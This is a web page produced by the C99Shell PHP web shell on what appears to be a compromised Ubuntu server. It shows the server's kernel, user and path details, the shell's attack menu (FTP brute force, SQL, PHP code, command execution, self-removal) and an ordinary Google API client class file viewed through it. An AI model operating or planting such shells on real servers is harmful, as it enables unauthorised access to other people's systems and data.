!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/google/apiclient-services/src/Google/Service/CloudFunctions/   drwxr-xr-x
Free 13.04 GB of 57.97 GB (22.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CloudFunction.php (6.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_CloudFunctions_CloudFunction extends Google_Model
{
  public 
$availableMemoryMb;
  public 
$buildEnvironmentVariables;
  public 
$buildId;
  public 
$buildWorkerPool;
  public 
$description;
  public 
$entryPoint;
  public 
$environmentVariables;
  protected 
$eventTriggerType 'Google_Service_CloudFunctions_EventTrigger';
  protected 
$eventTriggerDataType '';
  protected 
$httpsTriggerType 'Google_Service_CloudFunctions_HttpsTrigger';
  protected 
$httpsTriggerDataType '';
  public 
$ingressSettings;
  public 
$labels;
  public 
$maxInstances;
  public 
$name;
  public 
$network;
  public 
$runtime;
  public 
$serviceAccountEmail;
  public 
$sourceArchiveUrl;
  protected 
$sourceRepositoryType 'Google_Service_CloudFunctions_SourceRepository';
  protected 
$sourceRepositoryDataType '';
  public 
$sourceToken;
  public 
$sourceUploadUrl;
  public 
$status;
  public 
$timeout;
  public 
$updateTime;
  public 
$versionId;
  public 
$vpcConnector;
  public 
$vpcConnectorEgressSettings;

  public function 
setAvailableMemoryMb($availableMemoryMb)
  {
    
$this->availableMemoryMb $availableMemoryMb;
  }
  public function 
getAvailableMemoryMb()
  {
    return 
$this->availableMemoryMb;
  }
  public function 
setBuildEnvironmentVariables($buildEnvironmentVariables)
  {
    
$this->buildEnvironmentVariables $buildEnvironmentVariables;
  }
  public function 
getBuildEnvironmentVariables()
  {
    return 
$this->buildEnvironmentVariables;
  }
  public function 
setBuildId($buildId)
  {
    
$this->buildId $buildId;
  }
  public function 
getBuildId()
  {
    return 
$this->buildId;
  }
  public function 
setBuildWorkerPool($buildWorkerPool)
  {
    
$this->buildWorkerPool $buildWorkerPool;
  }
  public function 
getBuildWorkerPool()
  {
    return 
$this->buildWorkerPool;
  }
  public function 
setDescription($description)
  {
    
$this->description $description;
  }
  public function 
getDescription()
  {
    return 
$this->description;
  }
  public function 
setEntryPoint($entryPoint)
  {
    
$this->entryPoint $entryPoint;
  }
  public function 
getEntryPoint()
  {
    return 
$this->entryPoint;
  }
  public function 
setEnvironmentVariables($environmentVariables)
  {
    
$this->environmentVariables $environmentVariables;
  }
  public function 
getEnvironmentVariables()
  {
    return 
$this->environmentVariables;
  }
  
/**
   * @param Google_Service_CloudFunctions_EventTrigger
   */
  
public function setEventTrigger(Google_Service_CloudFunctions_EventTrigger $eventTrigger)
  {
    
$this->eventTrigger $eventTrigger;
  }
  
/**
   * @return Google_Service_CloudFunctions_EventTrigger
   */
  
public function getEventTrigger()
  {
    return 
$this->eventTrigger;
  }
  
/**
   * @param Google_Service_CloudFunctions_HttpsTrigger
   */
  
public function setHttpsTrigger(Google_Service_CloudFunctions_HttpsTrigger $httpsTrigger)
  {
    
$this->httpsTrigger $httpsTrigger;
  }
  
/**
   * @return Google_Service_CloudFunctions_HttpsTrigger
   */
  
public function getHttpsTrigger()
  {
    return 
$this->httpsTrigger;
  }
  public function 
setIngressSettings($ingressSettings)
  {
    
$this->ingressSettings $ingressSettings;
  }
  public function 
getIngressSettings()
  {
    return 
$this->ingressSettings;
  }
  public function 
setLabels($labels)
  {
    
$this->labels $labels;
  }
  public function 
getLabels()
  {
    return 
$this->labels;
  }
  public function 
setMaxInstances($maxInstances)
  {
    
$this->maxInstances $maxInstances;
  }
  public function 
getMaxInstances()
  {
    return 
$this->maxInstances;
  }
  public function 
setName($name)
  {
    
$this->name $name;
  }
  public function 
getName()
  {
    return 
$this->name;
  }
  public function 
setNetwork($network)
  {
    
$this->network $network;
  }
  public function 
getNetwork()
  {
    return 
$this->network;
  }
  public function 
setRuntime($runtime)
  {
    
$this->runtime $runtime;
  }
  public function 
getRuntime()
  {
    return 
$this->runtime;
  }
  public function 
setServiceAccountEmail($serviceAccountEmail)
  {
    
$this->serviceAccountEmail $serviceAccountEmail;
  }
  public function 
getServiceAccountEmail()
  {
    return 
$this->serviceAccountEmail;
  }
  public function 
setSourceArchiveUrl($sourceArchiveUrl)
  {
    
$this->sourceArchiveUrl $sourceArchiveUrl;
  }
  public function 
getSourceArchiveUrl()
  {
    return 
$this->sourceArchiveUrl;
  }
  
/**
   * @param Google_Service_CloudFunctions_SourceRepository
   */
  
public function setSourceRepository(Google_Service_CloudFunctions_SourceRepository $sourceRepository)
  {
    
$this->sourceRepository $sourceRepository;
  }
  
/**
   * @return Google_Service_CloudFunctions_SourceRepository
   */
  
public function getSourceRepository()
  {
    return 
$this->sourceRepository;
  }
  public function 
setSourceToken($sourceToken)
  {
    
$this->sourceToken $sourceToken;
  }
  public function 
getSourceToken()
  {
    return 
$this->sourceToken;
  }
  public function 
setSourceUploadUrl($sourceUploadUrl)
  {
    
$this->sourceUploadUrl $sourceUploadUrl;
  }
  public function 
getSourceUploadUrl()
  {
    return 
$this->sourceUploadUrl;
  }
  public function 
setStatus($status)
  {
    
$this->status $status;
  }
  public function 
getStatus()
  {
    return 
$this->status;
  }
  public function 
setTimeout($timeout)
  {
    
$this->timeout $timeout;
  }
  public function 
getTimeout()
  {
    return 
$this->timeout;
  }
  public function 
setUpdateTime($updateTime)
  {
    
$this->updateTime $updateTime;
  }
  public function 
getUpdateTime()
  {
    return 
$this->updateTime;
  }
  public function 
setVersionId($versionId)
  {
    
$this->versionId $versionId;
  }
  public function 
getVersionId()
  {
    return 
$this->versionId;
  }
  public function 
setVpcConnector($vpcConnector)
  {
    
$this->vpcConnector $vpcConnector;
  }
  public function 
getVpcConnector()
  {
    return 
$this->vpcConnector;
  }
  public function 
setVpcConnectorEgressSettings($vpcConnectorEgressSettings)
  {
    
$this->vpcConnectorEgressSettings $vpcConnectorEgressSettings;
  }
  public function 
getVpcConnectorEgressSettings()
  {
    return 
$this->vpcConnectorEgressSettings;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0057 ]--